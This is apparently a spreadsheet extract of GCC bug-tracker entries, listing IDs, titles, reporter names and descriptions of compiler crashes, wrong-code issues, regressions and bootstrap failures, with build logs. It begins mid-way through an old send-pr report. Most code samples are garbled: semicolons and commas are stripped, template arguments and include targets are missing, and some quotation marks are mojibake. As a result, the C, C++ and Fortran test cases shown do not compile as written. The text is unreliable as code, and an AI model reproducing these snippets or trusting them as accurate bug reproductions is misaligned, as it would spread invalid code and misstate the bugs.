archer.pst.qub.ac.uk&gt; gcc -O1 -ansi -g rtoptdepthinit.c
archer.pst.qub.ac.uk&gt; a.out
2241 3383
2241 3383
See attachments for rtoptdepthinit.i.bz2
Unformatted:
 SEND-PR: -*- send-pr -*-
 SEND-PR: Lines starting with `SEND-PR' will be removed automatically as
 SEND-PR: will all comments (text enclosed in `').
 SEND-PR: 
 SEND-PR: Please consult the GCC manual if you are not sure how to
 SEND-PR: fill out a problem report.
 SEND-PR: Note that the Synopsis field is mandatory.  The Subject (for
 SEND-PR: the mail) will be made the same as Synopsis unless explicitly
 SEND-PR: changed.
 SEND-PR:
 SEND-PR: Choose from the following categories:
 SEND-PR:
 SEND-PR: bootstrap c++ c debug fortran java libf2c libgcj libobjc libstdc++ middle-end objc optimization other preprocessor target web 
 SEND-PR: 
 SEND-PR:
 To: gcc-gnats@gcc.gnu.org
 Subject: gcc 3.0.3 produces wrong assembler code
 From: p.van-hoof@qub.ac.uk
 Reply-To: p.van-hoof@qub.ac.uk
 Cc: 
 X-send-pr-version: 3.113
 X-GNATS-Notify: 
 SEND-PR: Leave Confidential as no all GCC PRs are public.
 SEND-PR: critical     GCC is completely not operational no work-around known.
 SEND-PR: serious      GCC is not working properly a work-around is possible.
 SEND-PR: non-critical Report indicates minor problem.
 SEND-PR: medium       The problem should be solved in the next release.
 SEND-PR: low          The problem should be solve in a future release.
 SEND-PR: doc-bug          The documentation is incorrect.
 SEND-PR: accepts-illegal  GCC fails to reject erroneous code.
 SEND-PR: rejects-legal    GCC gives an error message for correct code.
 SEND-PR: wrong-code       The machine code generated by gcc is incorrect.
 SEND-PR: ice-on-legal-code   GCC gives an Internal Compiler Error (ICE)
 SEND-PR:                     for correct code
 SEND-PR: ice-on-illegal-code GCC gives an ICE instead of reporting an error
 SEND-PR: pessimizes-code     GCC misses an important optimization opportunity
 SEND-PR: sw-bug              Software bug of some other class than above
 SEND-PR: change-request      A feature in GCC is missing.
 SEND-PR: support             I need help with gcc.</t>
  </si>
  <si>
    <t>GCC-50923</t>
  </si>
  <si>
    <t>[4.4/4.5/4.6/4.7 Regression] No warning if function return value is not set</t>
  </si>
  <si>
    <t>The following program compiles without any warning (not even with -Wall -Wextra).
Expected: A default-option warning like:
  integer pure function f()
  1
  Warning: Return value of function 'f' at (1) not set
Note: If one has a non-contained function gfortran prints the warning shown above - but for internal functions or module functions it does not. It also works if one specifies a result(variable).
Note 2: In GCC 4.3 and earlier the warning was printed by the middle end.
module m
contains
  integer pure function f()
  end function f
end module m</t>
  </si>
  <si>
    <t>GCC-40619</t>
  </si>
  <si>
    <t>[c++0x] ICE on repeated decltype expression in auto functions</t>
  </si>
  <si>
    <t>template struct X {}
template auto f(T t) -&gt; X {}
template auto g(T t) -&gt; X {}
Compiling with -std=c++0x gives
decltype_ice.cc:4:52: internal compiler error: Segmentation fault: 11</t>
  </si>
  <si>
    <t>aaz</t>
  </si>
  <si>
    <t>GCC-79562</t>
  </si>
  <si>
    <t>sanitizer breaks bootstrap of x86_64-*-freebsd</t>
  </si>
  <si>
    <t>Bootstrap appears broken on x86_64-*-freebsd due to the sanitizer.
In file included from /home/sgk/gcc/gcc7/libsanitizer/sanitizer_common/sanitizer_platform_limits_posix.cc:59:0:
/usr/include/sys/timeb.h:42:2: warning: #warning this file includes  which is deprecated [-Wcpp]
 #warning this file includes  which is deprecated
  ^~~~~~~
/home/sgk/gcc/gcc7/libsanitizer/sanitizer_common/sanitizer_platform_limits_posix.cc:442:53: error: invalid application of 'sizeof' to incomplete type 'rtentry'
   unsigned struct_rtentry_sz = sizeof(struct rtentry)
                                                     ^
gmake[4]: *** [Makefile:523: sanitizer_platform_limits_posix.lo] Error 1
gmake[4]: Leaving directory '/mnt/sgk/obj7/x86_64-unknown-freebsd12.0/libsanitizer/sanitizer_common'
gmake[3]: *** [Makefile:467: all-recursive] Error 1
gmake[3]: Leaving directory '/mnt/sgk/obj7/x86_64-unknown-freebsd12.0/libsanitizer'
gmake[2]: *** [Makefile:337: all] Error 2
gmake[2]: Leaving directory '/mnt/sgk/obj7/x86_64-unknown-freebsd12.0/libsanitizer'
gmake[1]: *** [Makefile:15904: all-target-libsanitizer] Error 2
gmake[1]: Leaving directory '/mnt/sgk/obj7'
gmake: *** [Makefile:23097: bootstrap] Error 2</t>
  </si>
  <si>
    <t>andreast</t>
  </si>
  <si>
    <t>GCC-56813</t>
  </si>
  <si>
    <t>[4.9 regression] invalid assembly code for libiberty/cp-demangle.c on armv5tel-linux-gnueabi</t>
  </si>
  <si>
    <t>Created attachment 29776
preprocessed source and generated assembly code
Attempting to bootstrap gcc-4.9-20130331 on armv5tel-linux-gnueabi fails with:
ln -s /mnt/scratch/gcc-4.9-20130331/libstdc++-v3/../libiberty/cp-demangle.c cp-demangle.c
/bin/sh ../libtool --tag CC --tag disable-shared  --mode=compile /mnt/scratch/objdir49/./gcc/xgcc -B/mnt/scratch/objdir49/./gcc/ -B/mnt/scratch/install49/armv5tel-unknown-linux-gnueabi/bin/ -B/mnt/scratch/install49/armv5tel-unknown-linux-gnueabi/lib/ -isystem /mnt/scratch/install49/armv5tel-unknown-linux-gnueabi/include -isystem /mnt/scratch/install49/armv5tel-unknown-linux-gnueabi/sys-include    -DHAVE_CONFIG_H -I.. -I/mnt/scratch/gcc-4.9-20130331/libstdc++-v3/../libiberty -I/mnt/scratch/gcc-4.9-20130331/libstdc++-v3/../include -prefer-pic -D_GLIBCXX_SHARED -I/mnt/scratch/objdir49/armv5tel-unknown-linux-gnueabi/libstdc++-v3/include/armv5tel-unknown-linux-gnueabi -I/mnt/scratch/objdir49/armv5tel-unknown-linux-gnueabi/libstdc++-v3/include -I/mnt/scratch/gcc-4.9-20130331/libstdc++-v3/libsupc++   -g -O2 -DIN_GLIBCPP_V3 -Wno-error -c cp-demangle.c
libtool: compile:  /mnt/scratch/objdir49/./gcc/xgcc -B/mnt/scratch/objdir49/./gcc/ -B/mnt/scratch/install49/armv5tel-unknown-linux-gnueabi/bin/ -B/mnt/scratch/install49/armv5tel-unknown-linux-gnueabi/lib/ -isystem /mnt/scratch/install49/armv5tel-unknown-linux-gnueabi/include -isystem /mnt/scratch/install49/armv5tel-unknown-linux-gnueabi/sys-include -DHAVE_CONFIG_H -I.. -I/mnt/scratch/gcc-4.9-20130331/libstdc++-v3/../libiberty -I/mnt/scratch/gcc-4.9-20130331/libstdc++-v3/../include -D_GLIBCXX_SHARED -I/mnt/scratch/objdir49/armv5tel-unknown-linux-gnueabi/libstdc++-v3/include/armv5tel-unknown-linux-gnueabi -I/mnt/scratch/objdir49/armv5tel-unknown-linux-gnueabi/libstdc++-v3/include -I/mnt/scratch/gcc-4.9-20130331/libstdc++-v3/libsupc++ -g -O2 -DIN_GLIBCPP_V3 -Wno-error -c cp-demangle.c  -fPIC -DPIC -o cp-demangle.o
/tmp/ccdHzBmd.s: Assembler messages:
/tmp/ccdHzBmd.s:13290: Error: bad immediate value for offset (4104)
make[5]: *** [cp-demangle.lo] Error 1
make[5]: Leaving directory `/mnt/scratch/objdir49/armv5tel-unknown-linux-gnueabi/libstdc++-v3/libsupc++'
make[4]: *** [all-recursive] Error 1
make[4]: Leaving directory `/mnt/scratch/objdir49/armv5tel-unknown-linux-gnueabi/libstdc++-v3'
make[3]: *** [all] Error 2
make[3]: Leaving directory `/mnt/scratch/objdir49/armv5tel-unknown-linux-gnueabi/libstdc++-v3'
make[2]: *** [all-stage1-target-libstdc++-v3] Error 2
make[2]: Leaving directory `/mnt/scratch/objdir49'
make[1]: *** [stage1-bubble] Error 2
make[1]: Leaving directory `/mnt/scratch/objdir49'
make: *** [bootstrap] Error 2
This is a recent regression as the previous weekly snapshot 4.9-20130324 bootstrapped fine.
The preprocessed code for cp-demangle.c also compiles fine with current 4.8 4.7 and 4.6 branches.
Binutils is based on 2.22.52.0.1 20120131.
Configuration options:
/mnt/scratch/gcc-4.9-20130331/configure --prefix=/mnt/scratch/install49 --enable-bootstrap --enable-shared --enable-threads=posix --enable-checking=release --with-system-zlib --enable-__cxa_atexit --disable-libunwind-exceptions --enable-languages=cc++fortranada --disable-dssi --with-java-home=/usr/lib/jvm/java-1.5.0-gcj-1.5.0.0/jre --enable-libgcj-multifile --disable-java-maintainer-mode --with-ecj-jar=/usr/share/java/eclipse-ecj.jar --disable-libjava-multilib --disable-sjlj-exceptions --with-arch=armv5te --with-tune=xscale --build=armv5tel-unknown-linux-gnueabi --disable-plugin --disable-lto --disable-libmudflap
I'll attach cp-demangle.{is}.</t>
  </si>
  <si>
    <t>GCC-10315</t>
  </si>
  <si>
    <t>[3.2/3.3/3.4 regression] [powerpc] ICE: in extract_insn at recog.c:2175</t>
  </si>
  <si>
    <t>[ Reported to the Debian BTS as report #186299.
  Please CC 186299@bugs.debian.org on replies.
  Log of report can be found at http://bugs.debian.org/186299 ]
Rechecked with 3.2 20030314 and 3.3 20030404.
While building php3 on unstable/powerpc gcc-3.2 ICEs on a file that gcc-2.95
handles fine.  Attemps were made with gcc-2.95 (success) gcc-3.2 (fail) and
gcc-snapshot (fail).
Using -O0 or omitting -fPIC doesn't show the ICE.
$ gcc -c -fPIC -O1 pack.i
../functions/pack.c: In function `php3_unpack':
../functions/pack.c:807: error: unrecognizable insn:
(insn 1275 1022 3 0 (nil) (set (reg/v:DF 311)
        (const_double:DF 0.0 [0x0.0p+0])) -1 (nil)
    (nil))
../functions/pack.c:807: internal compiler error: in extract_insn at recog.c:2175
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
[appending the source in a followup]
Release:
3.2.1 (Debian) (Debian unstable)
Environment:
System: Debian GNU/Linux (unstable)
Architecture: powerpc</t>
  </si>
  <si>
    <t>186299</t>
  </si>
  <si>
    <t>GCC-24988</t>
  </si>
  <si>
    <t>[4.2 Regression] gfortran build fails with - Undefined symbols</t>
  </si>
  <si>
    <t>An attemped build of gfortran from a fresh down load failed with Undefined symbols
-
rm -rf libbackend.a
ar rc libbackend.a tree-chrec.o tree-scalar-evolution.o tree-data-ref.o tree-cfg.o tree-dfa.o tree-eh.o tree-ssa.o tree-optimize.o tree-gimple.o gimplify.o tree-pretty-print.o tree-into-ssa.o tree-outof-ssa.o tree-ssa-ccp.o tree-vn.o tree-ssa-uncprop.o tree-ssa-dce.o  tree-ssa-copy.o tree-nrv.o tree-ssa-copyrename.o tree-ssa-pre.o tree-ssa-live.o tree-ssa-operands.o tree-ssa-alias.o tree-ssa-phiopt.o tree-ssa-forwprop.o tree-nested.o tree-ssa-dse.o tree-ssa-dom.o domwalk.o tree-tailcall.o gimple-low.o tree-iterator.o tree-phinodes.o tree-ssanames.o tree-sra.o tree-complex.o tree-vect-generic.o tree-ssa-loop.o tree-ssa-loop-niter.o tree-ssa-loop-manip.o tree-ssa-threadupdate.o tree-vectorizer.o tree-vect-analyze.o tree-vect-transform.o tree-ssa-loop-ivcanon.o tree-ssa-propagate.o tree-ssa-address.o tree-ssa-math-opts.o tree-ssa-loop-ivopts.o tree-if-conv.o tree-ssa-loop-unswitch.o alias.o bb-reorder.o bitmap.o builtins.o caller-save.o calls.o cfg.o cfganal.o cfgbuild.o cfgcleanup.o cfglayout.o cfgloop.o cfgloopanal.o cfgloopmanip.o loop-init.o loop-unswitch.o loop-unroll.o cfgrtl.o combine.o conflict.o convert.o coverage.o cse.o cselib.o dbxout.o ddg.o tree-ssa-loop-ch.o loop-invariant.o tree-ssa-loop-im.o debug.o df.o diagnostic.o dojump.o dominance.o loop-doloop.o dwarf2asm.o dwarf2out.o emit-rtl.o except.o explow.o loop-iv.o expmed.o expr.o final.o flow.o fold-const.o function.o gcse.o genrtl.o ggc-common.o global.o graph.o gtype-desc.o haifa-sched.o hooks.o ifcvt.o insn-attrtab.o insn-emit.o insn-modes.o insn-extract.o insn-opinit.o insn-output.o insn-peep.o insn-recog.o integrate.o intl.o jump.o  langhooks.o lcm.o lists.o local-alloc.o loop.o mode-switching.o modulo-sched.o optabs.o options.o opts.o params.o postreload.o postreload-gcse.o predict.o insn-preds.o pointer-set.o print-rtl.o print-tree.o profile.o value-prof.o var-tracking.o real.o recog.o reg-stack.o regclass.o regmove.o regrename.o reload.o reload1.o reorg.o resource.o rtl.o rtlanal.o rtl-error.o sbitmap.o sched-deps.o sched-ebb.o sched-rgn.o sched-vis.o sdbout.o simplify-rtx.o sreal.o stmt.o stor-layout.o stringpool.o targhooks.o timevar.o toplev.o tracer.o tree.o tree-dump.o varasm.o varray.o vec.o version.o vmsdbgout.o xcoffout.o alloc-pool.o et-forest.o cfghooks.o bt-load.o pretty-print.o ggc-page.o web.o passes.o tree-profile.o rtlhooks.o cfgexpand.o lambda-mat.o lambda-trans.o     lambda-code.o tree-loop-linear.o tree-ssa-sink.o tree-vrp.o tree-stdarg.o tree-cfgcleanup.o tree-ssa-reassoc.o tree-ssa-structalias.o tree-object-size.o rs6000.o darwin.o host-darwin.o host-ppc-darwin.o tree-inline.o cgraph.o cgraphunit.o tree-nomudflap.o ipa.o ipa-inline.o ipa-utils.o ipa-reference.o ipa-pure-const.o ipa-type-escape.o ipa-prop.o ipa-cp.o
ranlib -c libbackend.a
gcc   -g -O2 -DIN_GCC   -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -pedantic -Wno-long-long -Wno-variadic-macros -Wold-style-definition -Wmissing-format-attribute -fno-common   -DHAVE_CONFIG_H  -o cc1-dummy c-lang.o stub-objc.o attribs.o c-errors.o c-lex.o c-pragma.o c-decl.o c-typeck.o c-convert.o c-aux-info.o c-common.o c-opts.o c-format.o c-semantics.o c-incpath.o cppdefault.o c-ppoutput.o c-cppbuiltin.o prefix.o c-objc-common.o c-dump.o c-pch.o c-parser.o darwin-c.o rs6000-c.o c-gimplify.o tree-mudflap.o c-pretty-print.o dummy-checksum.o \
  main.o tree-browser.o libbackend.a ../libcpp/libcpp.a ../libcpp/libcpp.a ./../intl/libintl.a -liconv  ../libiberty/libiberty.a
gcc   -g -O2 -DIN_GCC   -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -pedantic -Wno-long-long -Wno-variadic-macros -Wold-style-definition -Wmissing-format-attribute -fno-common   -DHAVE_CONFIG_H  -o f951 \
        fortran/arith.o fortran/array.o fortran/bbt.o fortran/check.o fortran/data.o fortran/decl.o fortran/dump-parse-tree.o fortran/error.o fortran/expr.o fortran/interface.o fortran/intrinsic.o fortran/io.o fortran/iresolve.o fortran/match.o fortran/matchexp.o fortran/misc.o fortran/module.o fortran/options.o fortran/parse.o fortran/primary.o fortran/resolve.o fortran/scanner.o fortran/simplify.o fortran/st.o fortran/symbol.o fortran/convert.o fortran/dependency.o fortran/f95-lang.o fortran/trans.o fortran/trans-array.o fortran/trans-common.o fortran/trans-const.o fortran/trans-decl.o fortran/trans-expr.o fortran/trans-intrinsic.o fortran/trans-io.o fortran/trans-stmt.o fortran/trans-types.o main.o tree-browser.o libbackend.a ../libcpp/libcpp.a -lmpfr -lgmp ../libcpp/libcpp.a ./../intl/libintl.a -liconv  ../libiberty/libiberty.a
/usr/bin/ld: warning multiple definitions of symbol _locale_charset
./../intl/libintl.a(localcharset.o) definition of _locale_charset in section (__TEXT__text)
/usr/lib/gcc/powerpc-apple-darwin8/4.0.0/../../../libiconv.dylib(localcharset.o) definition of _locale_charset
/usr/bin/ld: Undefined symbols:
_SUBTARGET_OS_CPP_BUILTINS
collect2: ld returned 1 exit status
make[2]: *** [cc1-dummy] Error 1
make[2]: *** Waiting for unfinished jobs....
/usr/bin/ld: warning multiple definitions of symbol _locale_charset
./../intl/libintl.a(localcharset.o) definition of _locale_charset in section (__TEXT__text)
/usr/lib/gcc/powerpc-apple-darwin8/4.0.0/../../../libiconv.dylib(localcharset.o) definition of _locale_charset
rm cpp.pod gfortran.pod fsf-funding.pod gpl.pod gcc.pod gcov.pod gfdl.pod
make[1]: *** [all-gcc] Error 2
make: *** [all] Error 2</t>
  </si>
  <si>
    <t>GCC-81741</t>
  </si>
  <si>
    <t>Misoptimisation : replacing a constant field read access by a function call</t>
  </si>
  <si>
    <t>GCC 7.1.0 generates for the following code:
#include 
typedef struct string_s {
  unsigned long size alloc
  char *ptr
} string_t[1]
# define M_ASSUME(x)                                    \
  (! __builtin_constant_p (!!(x) || !(x)) || (x) ?      \
   (void) 0 : __builtin_unreachable())
int f(string_t s)
{
  M_ASSUME(strlen(s-&gt;ptr) == s-&gt;size)
  return s-&gt;size
}
the following code on an x86-64 platform (gcc -std=c99 -O2 -S test.c):
f:
	subq	$8 %rsp
	movq	16(%rdi) %rdi
	call	strlen
	addq	$8 %rsp
	ret
Notice that the field access s-&gt;size is replaced by strlen(s-&gt;ptr) which is way slower.
GCC 4.9 doesn't have this issue.</t>
  </si>
  <si>
    <t>patrick.pelissier</t>
  </si>
  <si>
    <t>GCC-32020</t>
  </si>
  <si>
    <t>Invalid template error on non-dependent name</t>
  </si>
  <si>
    <t>The following code demonstrates that GCC raises an invalid error on certain template function syntax. It is the same error than on http://gcc.gnu.org/bugzilla/show_bug.cgi?id=19552 but on a NON-DEPENDENT name so the error is not appropriate here.
Please also note that this code compiles on MSVC++ EE 2005.
Here is the source code:
vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv
class template_function
{
public:
	template 
	int func()
	{
		return N
	}
}
class non_template_class
{
public:
	template_function tf
	void run()
	{
		tf.func() // SUCCESS
	}
}
// The PointLess template parameter makes gcc
// fail to see that tf is a non-dependent name
template 
class template_class
{
public:
	template_function tf
	void run()
	{
		tf.func() // FAIL
	}
}
int main()
{
	non_template_class ntc
	ntc.run()
	template_class tc
	tc.run()
	return 0
}
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Here is the output of G++:
vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv
Reading specs from /usr/lib/gcc-lib/i386-redhat-linux/3.2.3/specs
Configured with: ../configure --prefix=/usr --mandir=/usr/share/man --infodir=/usr/share/info --enable-shared --enable-threads=posix --disable-checking --with-system-zlib --enable-__cxa_atexit --host=i386-redhat-linux
Thread model: posix
gcc version 3.2.3 20030502 (Red Hat Linux 3.2.3-34)
 /usr/lib/gcc-lib/i386-redhat-linux/3.2.3/cpp0 -lang-c++ -D__GNUG__=3 -D__DEPRECATED -D__EXCEPTIONS -v -D__GNUC__=3 -D__GNUC_MINOR__=2 -D__GNUC_PATCHLEVEL__=3 -D__GXX_ABI_VERSION=102 -D__ELF__ -Dunix -D__gnu_linux__ -Dlinux -D__ELF__ -D__unix__ -D__gnu_linux__ -D__linux__ -D__unix -D__linux -Asystem=posix -D__NO_INLINE__ -D__STDC_HOSTED__=1 -D_GNU_SOURCE -Acpu=i386 -Amachine=i386 -Di386 -D__i386 -D__i386__ -D__tune_i386__ main.cpp -Wall main.ii
GNU CPP version 3.2.3 20030502 (Red Hat Linux 3.2.3-34) (cpplib) (i386 Linux/ELF)
ignoring nonexistent directory /usr/i386-redhat-linux/include
#include ... search starts here:
#include  search starts here:
 /usr/include/c++/3.2.3
 /usr/include/c++/3.2.3/i386-redhat-linux
 /usr/include/c++/3.2.3/backward
 /usr/local/include
 /usr/lib/gcc-lib/i386-redhat-linux/3.2.3/include
 /usr/include
End of search list.
 /usr/lib/gcc-lib/i386-redhat-linux/3.2.3/cc1plus -fpreprocessed main.ii -quiet -dumpbase main.cpp -Wall -version -o main.s
GNU CPP version 3.2.3 20030502 (Red Hat Linux 3.2.3-34) (cpplib) (i386 Linux/ELF)
GNU C++ version 3.2.3 20030502 (Red Hat Linux 3.2.3-34) (i386-redhat-linux)
	compiled by GNU C version 3.2.3 20030502 (Red Hat Linux 3.2.3-34).
main.cpp: In member function `void template_class::run()':
main.cpp:34: syntax error before `' token
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
And here is the main.ii file:
vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv
# 1 main.cpp
# 1 
# 1 
# 1 main.cpp
class template_function
{
public:
        template 
        int func()
        {
                return N
        }
}
class non_template_class
{
public:
        template_function tf
        void run()
        {
                tf.func()
        }
}
template 
class template_class
{
public:
        template_function tf
        void run()
        {
                tf.func()
        }
}
int main()
{
        non_template_class ntc
        ntc.run()
        template_class tc
        tc.run()
        return 0
}
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^</t>
  </si>
  <si>
    <t>trundegcc</t>
  </si>
  <si>
    <t>GCC-23167</t>
  </si>
  <si>
    <t>[4.0/4.1 Regression] internal compiler error: in create_tmp_var</t>
  </si>
  <si>
    <t>Linux 2.4.20-6
Using built-in specs.
Target: i686-pc-linux-gnu
Configured with: ../configure
Thread model: posix
gcc version 4.0.0
 g++ -DHAVE_CONFIG_H -I. -I.. -I. -g -O2 -MT dom.lo -MD -MP -MF .deps/dom.Tpo -c
../src/lib/globallocate/dom.cpp  -fPIC -DPIC -o .libs/dom.o
../src/lib/globallocate/dom.cpp: In member function
'std::list
std::allocator &gt; &gt;
std::allocator
std::allocator &gt; &gt; &gt; &gt;
supl_1_0::dom::eval_old(std::string) volatile':
../src/lib/globallocate/dom.cpp:163: internal compiler error: in create_tmp_var
at gimplify.c:368
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make: *** [dom.lo] Error 1</t>
  </si>
  <si>
    <t>mriben</t>
  </si>
  <si>
    <t>GCC-59906</t>
  </si>
  <si>
    <t>[4.7/4.8 Regression] error: size of variable '' is too large</t>
  </si>
  <si>
    <t>Hi
a colleague just reported a regression for the code below.
It compiles fine with 4.3.4 and 4.5.0 but fails with 4.7.4 and 4.8.2.
Cannot check trunk right now.
% gfortran48 robin_gfortran_bug.f90
robin_gfortran_bug.f90: In function 'y':
robin_gfortran_bug.f90:17:0: error: size of variable '' is too large
     print*str_cmp((/'aaa''bbb'/) str_aux)
 ^
% gfortran47 robin_gfortran_bug.f90      
robin_gfortran_bug.f90: In function 'y':
robin_gfortran_bug.f90:17:0: error: size of variable '' is too large
% cat robin_gfortran_bug.f90
program x
  implicit none
  call y('abcdef')
contains 
  subroutine y(str)
    character(len=*) intent(in) :: str
    character(len=len_trim(str)) :: str_aux
    str_aux = str
    ! Compiles
!   print*str_cmp((/'aaa''bbb'/) str)
    ! Does not compile:
    print*str_cmp((/'aaa''bbb'/) str_aux)
  end subroutine y
  elemental logical function str_cmp(str1 str2)
    character(len=*) intent(in) :: str1
    character(len=*) intent(in) :: str2
    str_cmp = (str1 == str2)
  end function str_cmp
end program x</t>
  </si>
  <si>
    <t>GCC-80891</t>
  </si>
  <si>
    <t>[8 Regression] Three new ICEs</t>
  </si>
  <si>
    <t>1)
 % cat chi_square_std_dev_test.ii
namespace std {
struct A {
  void operator&lt;&lt;(A(A))
}
template  _CharT endl(_Traits)
A a
}
using std::endl
void chi_squared_sample_sized() {
  using namespace std
  a &lt;&lt; endl
}
 % g++ -c chi_square_std_dev_test.ii
chi_square_std_dev_test.ii: In function â€˜void chi_squared_sample_sized()â€™:
chi_square_std_dev_test.ii:11:8: internal compiler error: in get_bindings at cp/pt.c:21559
   a &lt;&lt; endl
        ^~~~
0x7b3a35 get_bindings
        ../../gcc/gcc/cp/pt.c:21559
0x7b3af5 more_specialized_inst
        ../../gcc/gcc/cp/pt.c:21692
0x7b3c31 most_specialized_instantiation(tree_node*)
        ../../gcc/gcc/cp/pt.c:21732
0x5eef43 resolve_address_of_overloaded_function
        ../../gcc/gcc/cp/class.c:8251
0x5ccdf6 standard_conversion
        ../../gcc/gcc/cp/call.c:1123
0x5daef8 implicit_conversion
        ../../gcc/gcc/cp/call.c:1839
0x5dc896 add_function_candidate
        ../../gcc/gcc/cp/call.c:2196
0x5de6b7 add_candidates
        ../../gcc/gcc/cp/call.c:5479
0x5e6269 add_candidates
        ../../gcc/gcc/cp/call.c:5379
0x5e6269 build_new_op_1
        ../../gcc/gcc/cp/call.c:5653
0x5e6b3e build_new_op(unsigned int tree_code int tree_node* tree_node* tree_node* tree_node** int)
        ../../gcc/gcc/cp/call.c:6009
0x815de2 build_x_binary_op(unsigned int tree_code tree_node* tree_code tree_node* tree_code tree_node** int)
        ../../gcc/gcc/cp/typeck.c:3957
0x72e894 cp_parser_binary_expression
        ../../gcc/gcc/cp/parser.c:9051
0x72efe4 cp_parser_assignment_expression
        ../../gcc/gcc/cp/parser.c:9184
0x732e28 cp_parser_expression
        ../../gcc/gcc/cp/parser.c:9353
0x73b698 cp_parser_expression_statement
        ../../gcc/gcc/cp/parser.c:10912
0x7208e6 cp_parser_statement
        ../../gcc/gcc/cp/parser.c:10728
0x7219ad cp_parser_statement_seq_opt
        ../../gcc/gcc/cp/parser.c:11054
0x721a7f cp_parser_compound_statement
        ../../gcc/gcc/cp/parser.c:11008
0x722198 cp_parser_function_body
        ../../gcc/gcc/cp/parser.c:21445
2)
 % cat ptr_vector.ii
void swap()                                
namespace boost {                           
void swap()                                
}                                           
using namespace boost                      
template  void reversible_container_test() {             
  using namespace boost                    
  C a                                      
  swap(a)                                  
}                                           
namespace boost {                           
struct A {}                                
template  void swap()            
}                                           
void test_ptr_vector() { reversible_container_test } 
 % g++ -c ptr_vector.ii
ptr_vector.ii: In instantiation of â€˜void reversible_container_test() [with C = boost::A  = int  = int]â€™:                         
ptr_vector.ii:15:64:   required from here   
ptr_vector.ii:9:7: internal compiler error: in ovl_copy at cp/tree.c:2142               
   swap(a)                                 
   ~~~~^~~
0x7f7812 ovl_copy                           
        ../../gcc/gcc/cp/tree.c:2142        
0x7fc4e7 lookup_maybe_add(tree_node* tree_node*)                                        
        ../../gcc/gcc/cp/tree.c:2383        
0x6f951a name_lookup::add_fns(tree_node*)   
        ../../gcc/gcc/cp/name-lookup.c:688  
0x6f98ff name_lookup::adl_namespace(tree_node*)                                          
        ../../gcc/gcc/cp/name-lookup.c:714  
0x6f98ff name_lookup::adl_class_only(tree_node*)                                         
        ../../gcc/gcc/cp/name-lookup.c:740  
0x6f9c3e name_lookup::adl_bases(tree_node*) 
        ../../gcc/gcc/cp/name-lookup.c:774  
0x6fa094 name_lookup::adl_class(tree_node*) 
        ../../gcc/gcc/cp/name-lookup.c:817  
0x6fae3c name_lookup::search_adl(tree_node* vec*)          
        ../../gcc/gcc/cp/name-lookup.c:1001 
0x6faef4 lookup_arg_dependent(tree_node* tree_node* vec*) 
        ../../gcc/gcc/cp/name-lookup.c:1026 
0x7d6786 perform_koenig_lookup(cp_expr vec* int)          
        ../../gcc/gcc/cp/semantics.c:2270   
0x7903c0 tsubst_copy_and_build(tree_node* tree_node* int tree_node* bool bool)      
        ../../gcc/gcc/cp/pt.c:17253         
0x77ec33 tsubst_expr(tree_node* tree_node* int tree_node* bool)                      
        ../../gcc/gcc/cp/pt.c:16514         
0x77d3ae tsubst_expr(tree_node* tree_node* int tree_node* bool)                      
        ../../gcc/gcc/cp/pt.c:15778         
0x77c751 tsubst_expr(tree_node* tree_node* int tree_node* bool)                      
        ../../gcc/gcc/cp/pt.c:15764         
0x77ebf3 tsubst_expr(tree_node* tree_node* int tree_node* bool)                      
        ../../gcc/gcc/cp/pt.c:15991         
0x77a6cb instantiate_decl(tree_node* bool bool)                                        
        ../../gcc/gcc/cp/pt.c:22955         
0x7bc21b instantiate_pending_templates(int) 
        ../../gcc/gcc/cp/pt.c:23076         
0x6a2208 c_parse_final_cleanups()           
        ../../gcc/gcc/cp/decl2.c:4519  
3)
 % cat test_rayleigh.ii
namespace std {                             
void endl()                                
}                                           
using std::endl                            
template  void test_spots(RealType) {                                    
  using namespace std                      
  RealType a                               
  a &lt;&lt; endl                                
}                                           
void test_maintest_method() { test_spots(0.) }
 % g++ -c test_rayleigh.ii
test_rayleigh.ii: In instantiation of â€˜void test_spots(RealType) [with RealType = double]â€™:                                                                                        
test_rayleigh.ii:10:44:   required from here                                             
test_rayleigh.ii:8:5: internal compiler error: in tsubst_copy at cp/pt.c:14679          
   a &lt;&lt; endl                               
   ~~^~~~~~~
0x787fdf tsubst_copy                        
        ../../gcc/gcc/cp/pt.c:14679         
0x78fba7 tsubst_copy                        
        ../../gcc/gcc/cp/pt.c:14476         
0x78fba7 tsubst_copy_and_build(tree_node* tree_node* int tree_node* bool bool)      
        ../../gcc/gcc/cp/pt.c:17980         
0x78f500 tsubst_copy_and_build(tree_node* tree_node* int tree_node* bool bool)      
        ../../gcc/gcc/cp/pt.c:16899         
0x77ec33 tsubst_expr(tree_node* tree_node* int tree_node* bool)                      
        ../../gcc/gcc/cp/pt.c:16514         
0x77d3ae tsubst_expr(tree_node* tree_node* int tree_node* bool)                      
        ../../gcc/gcc/cp/pt.c:15778         
0x77c751 tsubst_expr(tree_node* tree_node* int tree_node* bool)                      
        ../../gcc/gcc/cp/pt.c:15764         
0x77ebf3 tsubst_expr(tree_node* tree_node* int tree_node* bool)                      
        ../../gcc/gcc/cp/pt.c:15991         
0x77a6cb instantiate_decl(tree_node* bool bool)                                        
        ../../gcc/gcc/cp/pt.c:22955         
0x7bc21b instantiate_pending_templates(int) 
        ../../gcc/gcc/cp/pt.c:23076         
0x6a2208 c_parse_final_cleanups()           
        ../../gcc/gcc/cp/decl2.c:4519 
2) and 3) got invalid during reduction. (Couldn't be bothered to fix them up.)</t>
  </si>
  <si>
    <t>GCC-41534</t>
  </si>
  <si>
